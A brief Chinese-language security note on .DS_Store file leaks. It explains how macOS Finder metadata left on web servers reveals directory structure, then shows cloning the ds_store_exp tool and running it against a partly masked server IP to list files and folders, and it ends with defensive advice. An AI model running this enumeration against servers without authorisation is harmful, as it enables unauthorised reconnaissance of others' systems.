什么是DS_Store

.DS_Store是MacOS下Finder用来保存如何展示 文件/文件夹 的数据文件。

在MacOS系统下使用项目打包后上传到服务器解包的情况，很容易将.DS_Store上传到线上环境，造成文件目录结构泄漏。

DS_Store利用

资产扫描，可以在字典中加上 .DS_Store 文件名

工具准备

git clone https://github.com/lijiejie/ds_store_exp
cd ds_store_exp/
pip install -r requirements.txt

文件系统泄露

python ds_store_exp.py http://42.192.xxx.xxx/.DS_Store

获取到DS_Store所在目录下所有文件夹、文件名

防御

删除DS_Store文件

使用Asepsis等工具，使MacOS产生的DS_Store文件不再存放于原目录